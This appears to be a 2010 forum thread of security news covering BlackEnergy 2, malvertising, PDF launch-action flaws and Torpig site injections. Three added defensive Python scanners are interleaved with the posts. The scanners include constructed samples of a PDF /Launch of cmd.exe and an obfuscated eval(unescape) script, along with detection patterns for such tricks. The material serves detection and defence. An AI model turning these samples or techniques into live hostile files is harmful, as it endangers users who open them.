A new variant of the BlackEnergy Trojan can destroy infected computers, as researchers have found: http://www.secureworks.com/research/threats/blackenergy2/
The first version of BlackEnergy was used for DDoS attacks on Georgia in 2008.
After all the versions that can be produced with the do-it-yourself toolkit, version 1.9.2 is the latest official variant.
Researchers at SecureWorks found that BlackEnergy 2 has now been under construction for more than two years.
Unlike its predecessor, this version uses modern rootkit/process-injection techniques, strong encryption and a modular architecture.
When the victim does not have full admin rights, the malware uses an exploit for a vulnerability from 2008 to get full rights.
In this way it is still possible for the rootkit to install.
Kill command
BlackEnergy also has plug-in support, to add all sorts of code to the Trojan.
At the moment this code is used to send spam and to steal online-banking log-on data.
The "banking Trojan plug-in" is similar to that in the Zeus Trojan and has been developed to destroy files on the victim's computer.
To do that an attacker can give a special "kill" command. The Trojan then overwrites the first 4,096 clusters with random data, and then tries to delete the "ntldr" and "boot.ini" files.
"This functionality will be used after the log-on data has been stolen, to prevent the victim noticing that money has disappeared from their account and notifying the bank." For the moment the Trojan just attacks Russian and Ukrainian banks.
And that is remarkable, because previously Russian hackers left their countrymen alone.
Plugins
According to Joe Stewart, BlackEnergy 2 is a big innovation compared to its predecessor.
"With the existing plugins it gives three access points for cybercrime."
The Trojan cannot yet be obtained as a toolkit, but when it is, it will be more popular than the previous version.
"In any case there is more room for innovation in stealth and functionality in the coming BlackEnergy 2 versions."
For the crypto-lovers among us, here is FireEye's publication on the first version of the malware: http://blog.fireeye.com/research/2010/03/black-energy-crypto.html
polonus
-
Hi malware fighters,
Online ads spread a dangerous Trojan, and ad-sellers do not make it easy to intercept the malcode.
The ads in question carry malicious JavaScript that launches eight exploits at visitors. After an exploit has been successful, a Trojan downloader is installed, which then installs the Zeus or Bredolab Trojan. Especially Zeus has made the news during recent months, because the malicious software is plundering bank accounts on a large scale.
Adblocker
By hacking ad-servers or posing as a legit advertiser, cybercriminals can easily get their malcode onto the machines of many Internet users. "The problem is even larger because legitimate ads are often heavily obfuscated to circumvent adblockers", according to Sophos's Fraser Howard.
Last weekend the av researcher saw loads of ad servers where malcreants had added malicious JavaScript to ads. "Quite a number of popular websites that load ads from these servers have been hit by these attacks," according to Fraser.
The malcode directs to the domain name googleanalitics.net, which is posing as the legit Google Analytics website.
Links: http://www.sophos.com/blogs/sophoslabs/?p=8960
http://isc.sans.org/diary.html?storyid=8350
Your best protection is to use Firefox with the ABP, NoScript and RequestPolicy extensions installed,
polonus
-
Sounds like a day late and a dollar short as this has been on the avast blog about the massive spread of malware through poisoned adverts, http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/ (http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/).
-
I don't think anyone has posted this advisory yet. It's about 2 weeks old.
http://secunia.com/advisories/38435
Tielei Wang has discovered a vulnerability in Google Picasa, which can be exploited by malicious people to potentially compromise a user's system.
The vulnerability is caused due to an integer overflow error in PicasaPhotoViewer.exe when processing JPEG files. This can be exploited to cause a heap-based buffer overflow by tricking a user into opening a specially crafted JPEG file and e.g. zooming in.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is confirmed in PicasaPhotoViewer.exe version 3.6.95.25, included in Google Picasa 3.6 build 95.25. Prior versions may also be affected.
Solution
Update to version 3.6 build 105.41.
-
Oh add this too for Opera 10.x users
http://secunia.com/advisories/38820
I don't use Opera, so feel free to qualify my entry if you think necessary.
-
Hi folks,
Doesn't matter, the only important thing is that we have them all nicely addressed here in this thread.
Users of the forums do not have to look elsewhere and have them all ready at hand to be forewarned, and so forearmed against threats of all sorts,
pol
-
OK, thanks for the good news guys, that means I can expect two warnings when I launch Secunia next time (I don't have it running constantly) >>> 1 for picasa, and a second for Opera 10.5 ;D
-
honestly haven't run Secunia OSI for ages - only this time because I ran repair on XP being reconditioned after 2 years use.
really, for those who are having glitches upgrading to avast 5, running Secunia OSI should be a first stop.
http://secunia.com/vulnerability_scanning/online/
click Start Scanner - choose display only insecure, click start - scanner runs, generates report at finish
Edit - my OSI test --> Macromedia sub-optimal
- so check Statistics in avast Summary and find there is no picture (graph) ???
Follow Secunia advice, download most recent Flashplayer and Flashplayer Macromed (with uninstall) utility and run new Secunia scan
- report reads all good (optimal performance) - so check Statistics in avast Summary - hey, picture!! :)
-
***
Microsoft: Don't press F1 key in Windows XP and any earlier version back to W2000 including Server.
Ignore sites that nag to press the Help key, says zero-day bug advisory.
March 1, 2010 (Computerworld) Microsoft told Windows XP users today not to press the F1 key when prompted by a Web site, as part of its reaction to an unpatched vulnerability that hackers could exploit to hijack PCs running Internet Explorer (IE).
In a security advisory issued late Monday, Microsoft confirmed the unpatched bug in VBScript that Polish researcher Maurycy Prodeus had revealed Friday, offered more information on the flaw and provided some advice on how to protect PCs until a patch shipped.
"The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer," read the advisory. "If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user."
For the rest of the story:
http://www.computerworld.com/s/article/print/9164038/Microsoft_Don_t_press_F1_key_in_Windows_XP?taxonomyName=Spam%2C+Malware+and+Vulnerabilities&taxonomyId=85
***
-
Hackers exploit Oscars
http://www.sophos.com/blogs/gc/g/2010/03/08/hackers-exploit-oscar
-
Here's a couple more from latest Sophos E-news
John C Dvorak and hundreds of others hacked on Twitter
http://www.sophos.com/blogs/chetw/g/2010/03/06/john-dvorak-falls-victim-twitter
Bad Bunny! Energizer Battery USB charger blamed for backdoor Trojan
http://www.sophos.com/blogs/gc/g/2010/03/08/bad-bunny-energizer
Are we entering some phase where we can expect an onslaught of malware exploits? ..a plague, no less
-
Secunia has updated the Secunia Online Software Inspector (OSI) with new
rules for detecting insecure software.
Run the Secunia OSI to make sure that your system is up-to-date:
http://secunia.com/vulnerability_scanning/online/
-
Microsoft warns of new IE bug; attacks under way
Internet Explorer 6 and its 2006 successor, IE7, contain a vulnerability that can be used by attackers to inject malicious code into a Windows PC. The oldest and newest of Microsoft's supported browsers, IE 5.01 and IE8, respectively, are not vulnerable to such attacks.
http://www.computerworld.com/s/article/9168138/Microsoft_warns_of_new_IE_bug_attacks_under_way?source=rss_news
http://www.informationweek.com/news/software/showArticle.jhtml?articleID=223300150
Twitter takes action on spammers and scammers
http://www.pcw.co.uk/v3/news/2259231/twitter-takes-action-spammers
-
Twitter takes action on spammers and scammers
yeah, but what for if ???
Microsoft could still buy Twitter, says Ballmer
http://www.pcw.co.uk/v3/news/2258895/microsoft-twitter-ballmer
;D
-
100% free pr0n ::)
Pinball Publisher Network: Yet more blackhat SEO goodness
Going through the latest Google results for new malicious goodness, I stumbled upon a URL I was fully expecting to be serving me with a fake AV (the last 10 or so I'd checked had done), but alas no, not this time. This time I was to be served a page that led me to a fake search results page (PPC fraud);
http://hphosts.blogspot.com/2010/03/pinball-publisher-network-yet-more.html
-
Microsoft races to plug IE hole after exploit code released
Microsoft said on Friday it is testing a patch to fix a new hole in Internet Explorer 6 and IE 7 following the release of exploit code on the Internet.
http://news.cnet.com/8301-27080_3-20000392-245.html
-
F-Secure with new security blog
http://safeandsavvy.f-secure.com/
-
Microsoft offers 'fix-it' workaround for IE zero-day
Microsoft has released a one-click “fix-it” workaround to help Web surfers block malware attacks against an unpatched vulnerability in its flagship Internet Explorer browser.
http://blogs.zdnet.com/security/?p=5726&tag=nl.e589
(Or you can just upgrade to IE8 )
-
F-Secure with new security blog
http://safeandsavvy.f-secure.com/
http://www.f-secure.com/weblog/archives/00001906.html
You'll notice that the name is pink. That's part of our new brand but it also reflects the authorship. Safe and Savvy's contributors are the female employees of F-Secure (mostly).
nmb
-
Looking for malware in all the wrong places?
Instead of looking for known patterns -- whether of instructions and data, or of actions -- wouldn't it be great if we could look for anything that is malicious? That may sound like a pipe dream.
Not to me.
nmb
-
Hackers lock Zeus crimeware kit with Windows-like anti-piracy tech
http://www.pcworld.idg.com.au/article/339670/hackers_lock_zeus_crimeware_kit_windows-like_anti-piracy_tech/
-
Waledac botnet 'decimated' by MS takedown
http://www.theregister.co.uk/2010/03/16/waledac_takedown_success/
Anti-virus suites still can't block Google China attack
http://www.theregister.co.uk/2010/03/16/aurora_av_test_fail/
-
Here we go again.......
New password-stealing virus targets Facebook
http://in.reuters.com/article/lifestyleMolt/idINTRE62G5A420100318
-
Here we go again.......
New password-stealing virus targets Facebook
http://in.reuters.com/article/lifestyleMolt/idINTRE62G5A420100318
Yep...
I got this one...(as well as the ups one again...)
Wanted to download it to see if it was detected or not, but hotmail wouldn't let me...can't even forward it to the VT service as MS trashes the attachment because it is malicious...at least MS is on the ball on this one...
Oddly though, my email address isn't spg_pentagram ???
-
Hi malware fighters,
In the last 48 hours the number of Koobface (anagram of Facebook) C&C servers has doubled:
http://www.infosecurity-magazine.com/view/8018/koobface-commandandcontrol-servers-double-in-48-hours/
* Be careful not to open links in suspicious messages, even if the sender is a known Facebook friend.
* Use an up-to-date browser like Google Chrome, Firefox 3.x, Internet Explorer 8, Opera 10, etc.
* Hand out minimal personal data; never give your real address, telephone number or other private data.
* Keep your anti-malware software up-to-date to protect against new variants of the malware attacking your machine. Users on XP can use System Restore to restore to a situation before the infection occurred.
polonus
-
Secunia
Mozilla Confirms Critical Firefox Vulnerability
http://news.softpedia.com/news/Mozilla-Confirms-Critical-Firefox-Vulnerability-138014.shtml
-
Chinese Academics' Paper on Cyberwar Sets Off Alarm in U.S
http://www.nytimes.com/2010/03/21/world/asia/21grid.html
-
Hi malware fighters,
Malware found to redirect 400 anti-malware sites back to google IP via changed hosts file:
http://sunbeltblog.blogspot.com/2010/03/using-windows-hosts-file-to-cut-off.html
polonus
-
I'm one of the (probably) very few who doesn't bother with a hosts file as part of my defense system, so all I've got is the default Win file with just the single localhost entry. I do take a quick look at it as part of my weekly cleanup routine, but obviously it's very easy to spot any changes that way.
-
don't talk like that ;D Hostsfile utilities are still very useful for those running Internet Explorer ... on a more serious note, I don't bother with the hostsfile either, but I use Firefox ;)
ps: for those a bit lost here, IE has the ability to easily allow most site re-directions, while Firefox is protected against that.
-
I don't bother with the HOSTS file either ;D
There are a number of applications that include Hosts file monitoring/locking/blocking, etc. I have WinPatrol Plus, which monitors that in real time as one of its many monitoring functions; I think the free version only has monitoring at a set time period.
There are no doubt other such tools that do the same.
-
I would have thought a protected hosts file was a quick and easy fix against intrusion by parasites, as the advertising says. Don't tell me I've gone and fallen for a juicy header, after my many, many tirades against the advertisers,
-
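The hosts-file hijack discussed in the posts above, as an added example that is not code from the thread or from any tool the posters mention: a small auditor that parses a hosts file the way the resolver does and reports every watched security-vendor domain that is mapped anywhere at all, splitting redirects to a remote address from silent blocks to loopback or 0.0.0.0. The watched-domain list and the sample hosts file are constructed for this example.

```python
"""Audit a hosts file for entries that hijack security-vendor domains.

Added example, not code from the thread or from WinPatrol. It parses
hosts-file text the way resolvers do (first token is the address, the
remaining tokens are names, '#' starts a comment) and reports every
watched security domain that is mapped anywhere at all: to a remote
address (the redirect the Sunbelt post describes) or to loopback/0.0.0.0
(a silent block of AV updates). The watch list and the sample file are
constructed for this example.
"""
import ipaddress
import sys

# Constructed watch list. A clean hosts file has no reason to mention any
# of these, so every hit is worth a look.
WATCHED_DOMAINS = {
    "www.virustotal.com",
    "www.malwarebytes.org",
    "www.avast.com",
    "update.avast.com",
    "forum.avast.com",
    "www.sophos.com",
}


def parse_hosts(text):
    """Yield (address, hostname, line_no) for every mapping in the file."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and padding
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue  # malformed line, nothing mapped
        address, names = parts[0], parts[1:]
        for name in names:
            yield address, name.lower(), line_no


def classify(address):
    """Return 'loopback', 'unspecified', 'remote' or 'invalid' for an address."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return "invalid"
    if ip.is_loopback:
        return "loopback"
    if ip.is_unspecified:
        return "unspecified"  # 0.0.0.0 / ::, the usual 'block' target
    return "remote"


def audit_hosts(text, watched=WATCHED_DOMAINS):
    """Group findings: watched names sent off-box, watched names blocked,
    and whether 'localhost' still resolves to a loopback address."""
    report = {"redirected": [], "blocked": [], "localhost_ok": True}
    for address, name, line_no in parse_hosts(text):
        kind = classify(address)
        if name == "localhost" and kind != "loopback":
            report["localhost_ok"] = False
        if name not in watched:
            continue
        finding = {"line": line_no, "host": name, "address": address, "kind": kind}
        if kind in ("loopback", "unspecified"):
            report["blocked"].append(finding)
        else:
            report["redirected"].append(finding)  # remote or garbage address
    return report


# Constructed sample hosts file. 203.0.113.10 is a TEST-NET-3 documentation
# address standing in for the foreign IP the malware pointed AV sites at.
SAMPLE_HOSTS = """\
# constructed sample, modelled on the redirect described in the thread
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.virustotal.com www.malwarebytes.org   # redirected
127.0.0.1       update.avast.com
0.0.0.0         ads.example.net
"""


def main(argv):
    """Audit the file given on the command line, or the built-in sample."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    report = audit_hosts(text)
    for f in report["redirected"]:
        print(f"line {f['line']}: {f['host']} -> {f['address']} (REDIRECTED, {f['kind']})")
    for f in report["blocked"]:
        print(f"line {f['line']}: {f['host']} -> {f['address']} (blocked)")
    if not report["localhost_ok"]:
        print("localhost no longer resolves to a loopback address")
    return 1 if report["redirected"] or report["blocked"] else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

On Windows the file to pass is %SystemRoot%\System32\drivers\etc\hosts; on Unix-like systems /etc/hosts.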
Symantec names riskiest U.S. cities for cybercrime
http://www.computerworld.com/s/article/9173928/Symantec_names_riskiest_U.S._cities_for_cybercrime?taxonomyId=82
Is your city a cybercrime center?
http://www.networkworld.com/news/2010/032310-cybercrime-cities.html?page=1
Cyber criminals getting specialized, FBI says
http://fcw.com/articles/2010/03/23/web-fose-chabinsky-cyber-threat.aspx
Proposed US law would single out cybercrime havens
http://www.networkworld.com/news/2010/032310-proposed-us-law-would-single.html?hpg1=bn
-
***
Gmail starts warning users of suspicious account activity :
http://www.computerworld.com/s/article/9174044/Gmail_now_warns_users_of_suspicious_account_activity
http://gmailblog.blogspot.com/2010/03/detecting-suspicious-account-activity.html
***
-
Hacker Disables More Than 100 Cars Remotely
http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/
-
Hi malware fighters,
The main countries from where directed attacks are being performed are China and Romania; the USA is in third position. Most dangerous are those e-mails that come with an encrypted RAR file attached: http://www.messagelabs.com/mlireport/MLI_2010_03_Mar_FINAL-EN.pdf
polonus
-
Hacker gets 20 years in credit card thefts ....... :D
http://www.msnbc.msn.com/id/36039784/ns/us_news-crime_and_courts/
-
Hi malware fighters,
Apparently, "Detecting and Defeating Government Interception Attacks Against SSL": certification authorities have provided governments with false certificates, so they need not break encryption and can easily circumvent it: http://files.cloudprivacy.net/ssl-mitm.pdf
Involved is Packet Forensics: http://www.wired.com/threatlevel/2010/03/packet-forensics
Now we understand why a lot of browsers trust a lot of certificates:
http://www.eff.org/deeplinks/2010/03/researchers-reveal-likelihood-governments-fake-ssl
polonus
-
Hi malware fighters,
Apparently, "Detecting and Defeating Government Interception Attacks Against SSL": certification authorities have provided governments with false certificates, so they need not break encryption and can easily circumvent it: http://files.cloudprivacy.net/ssl-mitm.pdf
Involved is Packet Forensics: http://www.wired.com/threatlevel/2010/03/packet-forensics
Now we understand why a lot of browsers trust a lot of certificates:
http://www.eff.org/deeplinks/2010/03/researchers-reveal-likelihood-governments-fake-ssl
polonus
I hope that's not true ??? :o
-
@Logos,
More links: http://www.betanews.com/article/Has-SSL-become-pointless-Researchers-suspect-statesponsored-CA-forgery/1269551694
http://betabubble.com/?tag=intermediate-certificates
It was not developed with your security in mind....
It is all about endpoints, and it is all about trust to what is going over the "wire"......
DNSSEC has a similar attack against it,
polonus
-
I trust the sources, that's not the problem, I was just a bit shocked to say the least. I posted that on Comodo forums to get some reactions (could be interesting as they're in ssl business) but no feedback so far...
-
Trojans masquerading as updates for popular applications such as Adobe, Java or Windows.
I read this on Sunbelt blog
http://sunbeltblog.blogspot.com/2010/03/fake-updates-install-backdoors.html (http://sunbeltblog.blogspot.com/2010/03/fake-updates-install-backdoors.html)
Also more info on Softpedia
http://news.softpedia.com/news/Trojan-Masquerades-as-Adobe-Reader-Updater-Component-138453.shtml (http://news.softpedia.com/news/Trojan-Masquerades-as-Adobe-Reader-Updater-Component-138453.shtml)
Edited wrong Link
-
Hi malware fighters,
Security researcher D. Stevens has published a hole in PDF that cannot be patched!
POC: http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
Forewarned is forearmed. Adobe is putting everyone in danger,
polonus
-
I now use Foxit - regardless that it is a less supported PDF platform
-
I use sumatra pdf. recommended by scott, its awesome. Thanks scott. No problems whatsoever.
nmb
-
okay, I'll give it a go. no doubt still recommended by Scott.
-
I use both foxit and Sumatra as they both come in portable versions (portableapps.com)
Simple, small, lightweight, and crucially not targeted as much as adobe ;D
-
Thats what I'll do Scott. And the portable on my flash drive as well. Cheers, buddy.
-
Hi malware fighters Scott and mkis,
Thanks for the additional info, forum friends. Adobe has been under malware flak for too long now and their patch cycle cannot keep up with what is upcoming; as this cannot be patched, as Didier Stevens mentions, it is better to shun Adobe's PDF software until they really clean up their act,
polonus
-
OK this is all interesting, and I (seriously) don't doubt a second about the existence of Adobe Reader or Flash vulnerabilities. This said, I'm still waiting for my first Adobe related infection ;D
-
My personal third-party choice is Tracker's PDF-XChange Viewer (freeware, at least the version I've got).
If I understand correctly, the vulnerability is in Adobe's reader itself, rather than anything inherent in PDF coding, so 3rd party viewers should be OK.
I suspect Adobe has a general attitude problem about proper security. Maybe my sense of what happened when is a little fuzzy, but didn't all the problems with Flash start more or less when Adobe took that (and Shockwave generally) over?
-
Hi Logos,
The case is worse than the responders thought: it is not only Adobe PDF that is holed, it is all PDF. In Foxit it is even worse, as you get no warning and still the POC works. Use this to test: http://didierstevens.com/files/data/launch-action-cmd.zip If cmd.exe is started well :'(
It is broken, folks, it is broken, they are going for broke!!! This is the POC for Foxit Reader: http://twitter.com/riotz/status/11281340909
But PDF-XChange Viewer still standing, nothing being executed only thing you get is an error after the warning....
polonus
-
yeah, sounds like it's the PDF (native structure) itself that is responsible for this possible threat >>> an embedded virus contained in the document, not even using a security flaw. There's nothing Adobe can do against that. It's normally up to the user to be careful and avoid clicking, as long as a dialog box is displayed... but this can be controlled too, according to the author of that article... I guess many other types of documents could be infected in a similar way. That's life, that's where you browse and how you browse. Legit sites don't spread such stuff, unless a site has been hacked... and I guess this sort of malware is absolutely undetectable by any AV... (maybe if full file scan is selected, not sure...)
-
Hi Logos,
It won't work in Foxit Reader once you patch it, by taking support for URL, launch, movie and sound out of the Reader,
polonus
-
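A triage check for the /Launch action discussed in the posts above. This is an added example, not Didier Stevens' POC and not pdfid or any poster's tool; it is a plain byte scan that counts the PDF name tokens most often used to make a document do something on open, resolves the #xx escapes a PDF name may carry (so /L#61unch is still seen as /Launch), and pulls out the /F target of each launch action. The list of names and the two sample PDFs are constructed for the example; the scan does not inflate compressed object streams, so a /ObjStm count is reported as a "look deeper" marker rather than a verdict.

```python
import re

# Name tokens worth counting. /Launch is the action the POC uses; the others are
# the usual carriers of auto-executing content. /ObjStm is counted only as a
# warning that objects may be hidden inside compressed object streams, which
# this plain byte scan does not inflate. (Assumed list for triage, not a policy.)
RISKY_NAMES = (b"/Launch", b"/OpenAction", b"/AA", b"/JavaScript", b"/JS",
               b"/EmbeddedFile", b"/ObjStm")

_NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")   # one PDF name token
_HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")      # #xx escape inside a name


def _decode_name(tok: bytes) -> bytes:
    """Resolve #xx escapes so that /L#61unch is recognised as /Launch."""
    return _HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), tok)


def _normalize(data: bytes) -> bytes:
    """Rewrite every name token in its canonical (unescaped) form."""
    return _NAME_RE.sub(lambda m: _decode_name(m.group(0)), data)


def scan_pdf_actions(data: bytes) -> dict:
    """Count occurrences of each risky name token, escapes resolved."""
    counts = {name: 0 for name in RISKY_NAMES}
    for m in _NAME_RE.finditer(data):
        name = _decode_name(m.group(0))
        if name in counts:
            counts[name] += 1
    return counts


# /Launch ... /F (target): /F may sit in a nested /Win << >> dictionary, so the
# search may cross '<<' but stops at the first '>>'.
_LAUNCH_TARGET = re.compile(
    rb"/Launch(?:(?!>>).)*?/F\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)


def launch_targets(data: bytes) -> list:
    """Return the file or command each /Launch action points at."""
    return [m.group(1).decode("latin-1")
            for m in _LAUNCH_TARGET.finditer(_normalize(data))]


def is_suspicious(data: bytes) -> bool:
    """True when the file carries a launch action or script, i.e. something that
    can run without the reader having a memory-corruption bug at all."""
    c = scan_pdf_actions(data)
    return (c[b"/Launch"] + c[b"/JavaScript"] + c[b"/JS"]) > 0


# Constructed samples, not real malware: a minimal PDF whose /OpenAction is a
# /Launch of cmd.exe, with the action name written as /L#61unch to show that a
# naive grep for "/Launch" would miss it, and one clean PDF.
SAMPLE_LAUNCH_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Type /Action /S /L#61unch"
    b" /Win << /F (cmd.exe) /P (/c echo harmless) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_CLEAN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("launch", SAMPLE_LAUNCH_PDF), ("clean", SAMPLE_CLEAN_PDF)):
        print(label, scan_pdf_actions(pdf), launch_targets(pdf), is_suspicious(pdf))
```

Run it against a real file with `scan_pdf_actions(open(path, "rb").read())`; a non-zero /Launch, /JS or /JavaScript count on a document that arrived by mail is reason enough not to open it in any reader, whatever the vendor, since the warning dialog is the only thing between the user and cmd.exe.
-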
Hi forum members,
Did you install the emergency patch for IE?; re: http://www.dshield.org/diary.html?storyid=8533
I did,
polonus
-
Isn't this covered in the various updates that have already been installed with auto update by MS ???
-
yep, it's just that ;)
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx
-
Mine updated this morning with a greeting to reboot now or in 15 min. :)
More info here (http://blogs.zdnet.com/security/?p=5921&tag=nl.e539)
-
Here's mine - come through yesterday when I powered on the computer
http://www.microsoft.com/security/updates/bulletins/201003_oob.aspx
The other entry for 31/3/10 is an optional Compatibility View tweak with market-by-market functionality
I ran a check through the optional updates after the auto updates had downloaded and before I restarted.
I install a lot of the optional updates - this time I also loaded the .NET optionals, since I have .NET on my system
-
Mine updated this morning with a greeting to reboot now or in 15 min. :)
My XP Pro system installed Cumulative Security Update for Internet Explorer 8 for Windows XP (KB980182) when I powered it off about midnight and my Windows 7 system updated just now when I went to Windows Update and it indicated an Important update was available.
-
Hi YoKenny,
Because they had experienced the exploit being abused in the wild and they could not wait any longer with a patch. There was a Fix-It for it already, but that now has been turned into a general patch for the various IE versions,
polonus
-
Hi malware fighters,
Foxit Reader will patch the unpatchable hole next week: http://forums.foxitsoftware.com/showthread.php?p=41323
Good news,
pol
-
Hi malware fighters,
The Torpig, aka Sinowal, malware will put obfuscated malicious JavaScript into a website's pages and/or JavaScript files. The malcode on the website's pages and JavaScript files is changed from time to time and might be removed completely as well. The malware gets onto the website through compromised FTP credentials, via malware located on a machine that has accessed the site through FTP. To prevent the website from being reinfected, change the FTP password and remove the malware from the infected machines before it is used over and over again to access the website through FTP. Re: http://www.sophos.com/security/analyses/viruses-and-spyware/trojtorpigbl.html
The most recent script format is attached as a screendump (source: WhiteFirDesign)
Click to make more visible - pol
-
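A way to sweep a site's document root for the kind of injected script described above, as an added example and not code from the post or from Sophos. The heuristics are assumptions about obfuscated JavaScript in general (an eval/unescape or eval/fromCharCode decoder chain, long runs of %xx or \x escapes, a very long one-line script), not a signature of the current Torpig script, which the post says changes from time to time. The sample page is constructed; its encoded payload decodes to a harmless fragment.

```python
import os
import re
from html.parser import HTMLParser

# Generic obfuscation indicators (assumed, not a family signature).
_DECODER_CALLS = re.compile(
    r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
_ESCAPE_RUNS = re.compile(
    r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}){8,}")
_LONG_LINE = 300   # a one-line script longer than this is unusual for hand-written code


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies together with the line each starts on."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # (start_line, body)
        self._in_script = False
        self._start = 0
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._start = self.getpos()[0]
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._start, "".join(self._buf)))
            self._in_script = False


def score_script(body: str) -> list:
    """Return the reasons a script body looks like injected obfuscated code (empty if none)."""
    reasons = []
    calls = {m.group(1) for m in _DECODER_CALLS.finditer(body)}
    if "eval" in calls and calls & {"unescape", "String.fromCharCode"}:
        reasons.append("decoder chain: " + ", ".join(sorted(calls)))
    if _ESCAPE_RUNS.search(body):
        reasons.append("long run of %xx / \\x escapes")
    if len(body) > _LONG_LINE and body.strip().count("\n") == 0:
        reasons.append("very long single-line script")
    return reasons


def scan_html(html: str) -> list:
    """[(line, reasons)] for every inline script in a page that trips a heuristic."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return [(line, r) for line, body in p.scripts if (r := score_script(body))]


def scan_tree(root: str) -> list:
    """Walk a document root; .js files are scored whole, HTML-like files per script."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            ext = fn.lower().rsplit(".", 1)[-1]
            if ext not in ("html", "htm", "php", "js"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if ext == "js":
                r = score_script(text)
                if r:
                    findings.append((path, 1, r))
            else:
                findings.extend((path, line, r) for line, r in scan_html(text))
    return findings


# Constructed page: one normal inline script and one injected decoder call.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script type="text/javascript">
function init() { document.getElementById('cart').style.display = 'block'; }
</script>
</head><body onload="init()">
<div id="cart">Your cart is empty.</div>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%22%29'));</script>
</body></html>
"""

if __name__ == "__main__":
    for line, reasons in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {'; '.join(reasons)}")
```

Run `scan_tree("/var/www/site")` on a copy pulled from the server after the FTP password has been changed; a hit in a file you never edited, on a line that sits just before `</body>` or at the very top of a .js file, is the pattern to look for. It only finds what is in the files, so run it again after cleaning the infected workstation, since the injection comes back as long as the stolen credentials still work.
-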
Firefox 3.6.3 fixes a critical security issue that could potentially allow remote code execution... More info here:
http://www.mozilla.org/security/announce/2010/mfsa2010-25.html
-
Exploits not needed to attack via PDF files
http://news.cnet.com/8301-27080_3-20001792-245.html
-
DHS studying global response to Conficker botnet
The Conficker Working Group report could provide a template for future cyber attack responses, security experts say
http://www.infoworld.com/d/security-central/dhs-studying-global-response-conficker-botnet-127
-
Hi malware fighters,
PONDUS can you give this in English?
New Java malware misleads AV scanners: http://www.idg.no/computerworld/tema/sikkerhet/article163040.ece
Also: http://www.woodmann.com/forum/archive/index.php/t-13454.html
pol
-
Hackers spam out malware disguised as "account notification" warning
http://www.sophos.com/blogs/gc/g/2010/04/06/account-notification-email
Emails claiming that recipient's accounts have been temporarily suspended are being seen around the world today, attempting to trick users into believing that their email account has been accessed by somebody else. Ensure that your computer systems are protected and find out more now.
-
No change here other than perhaps Sophos trying to gain some kudos for something that has been going on for ages, not just happened/happening today.
-
They do say that it is a 'tried and trusted social engineering trick', and I think the point of the article is that the ruse targets those returning from the Easter break. Perhaps the same scam went down in previous Easter breaks. I cannot recall. I guess they have to report it anyway.
-
Mozilla warns of unknown root certificate authority in Firefox (http://blogs.zdnet.com/security/?p=6016&tag=nl.e589)
“…I have not been able to find the current owner of this root. Both RSA and VeriSign have stated in email that they do not own this root.
Therefore, to my knowledge this root has no current owner and no current audit, and should be removed from NSS.”
-
thanks for this warning; that's been updated, RSA is the owner but acknowledges that the certificate isn't in use anymore >>> so, it should be removed. It's this one: RSA Security 1024 V3. http://blog.mozilla.com/security/2010/04/06/removing-the-rsa-security-1024-v3-root/
-
Adobe suggests workaround for PDF embedded executable hack
http://blogs.zdnet.com/security/?p=6028&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+zdnet/security+(ZDNet+Zero+Day)
-
Report: Windows 7 holes eased by axing admin rights
http://news.cnet.com/8301-27080_3-20001359-245.html?tag=content;col1
-
Subscription to malware testing
The title may imply that this article is about subscription services for email checking ?
Rather not! This time we shall examine yet another way that criminal activity imitates legitimate business.
http://www.norman.com/security_center/security_center_archive/2010/79170/en-uk
-
MS Patch Tuesday heads-up: 25 holes in Windows, Office
Microsoft plans to release 11 security bulletins on Tuesday April 13, 2010 to fix 25 documented vulnerabilities that expose Windows users to remote code execution attacks.
http://blogs.zdnet.com/security/?p=6070&tag=nl.e540
-
1-in-10 Windows PCs still vulnerable to Conficker worm
